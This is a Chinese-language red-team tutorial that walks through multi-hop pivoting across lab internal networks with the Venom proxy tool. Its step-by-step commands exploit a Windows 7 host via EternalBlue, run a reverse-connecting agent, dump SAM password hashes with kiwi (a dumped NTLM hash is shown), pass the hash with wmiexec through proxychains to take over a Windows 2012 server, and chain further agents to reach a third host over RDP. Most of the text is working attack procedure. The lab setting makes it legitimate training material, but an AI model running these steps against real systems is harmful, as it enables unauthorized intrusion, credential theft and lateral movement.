红队渗透系列-内网穿透之Venom(毒液)三层内网穿透

实际操作视频地址请移步

https://www.bilibili.com/video/BV1x24y1o7WC/

venom 三层内网穿透

Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。

特点是部署简洁轻松,有网络拓扑和节点控制。

下载地址

https://github.com/Dliv3/Venom/releases/tag/v1.1.0

靶场拓扑图

红队渗透系列-内网穿透之Venom(毒液)三层内网穿透

部署步骤:

1.kali上执行venom,本地监听9999端口

#./admin_linux_x64 -lport 9999

2.利用永恒之蓝获取win7-1的shell,上传agent.exe,并执行

meterpreter > execute -f “c:windows empagent.exe -rhost 192.168.1.5 9999”

3.在跳板机win7-1上,获取administrator的hash,后面用pth攻击win2012

meterpreter > load kiwi

meterpreter > lsa_dump_sam

记下administrator的hash,lm:ntlm形式41c3fc4a0f0950659a67bb2340a5f2dd:ccef208c6485269c20db2cad21734fe7

4.venom的(admin node) 节点下执行命令show

5.venom的(admin node) 节点下执行命令 goto 1

6.在node 1执行socks 1080,在kali 192.168.1.5上监听1080端口

(node 1) >>> socks 1080

7.设置代理proxychains

vi /etc/proxychains4.conf

socks5 192.168.1.5 1080

8.用wmiexec.py工具利用pth通过proxychains攻击win2012 10.10.10.13

proxychains python wmiexec.py administrator@10.10.10.13 -hashes 41c3fc4a0f0950659a67bb2340a5f2dd:ccef208c6485269c20db2cad21734fe7 -codec gbk

8.1上传agent.exe到win2012 10.10.10.13上

9.在win7-1上执行监听9998端口

(node 1) >>> listen 9998

10.在win2012 10.10.10.13上执行agent.exe,反向链接win7-1 10.10.10.7的9998端口

C:windows emp>agent.exe -rhost 10.10.10.7 -rport 9998

11.在venom 上操作去节点2,并执行socks 1081 ,在kali上监听1081端口

(node 1) >>> goto 2

(node 2) >>> socks 1081

12.设置代理工具proxychains的代理端口为1081

13.通过代理工具proxychains远程链接10.10.20.7,成功

proxychains rdesktop 10.10.20.7

目前完成二层网络穿透,如果完成三层或者四层内网穿透,也是重复同样的步骤

https://www.bilibili.com/video/BV1x24y1o7WC/

© 版权声明

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
none
暂无评论...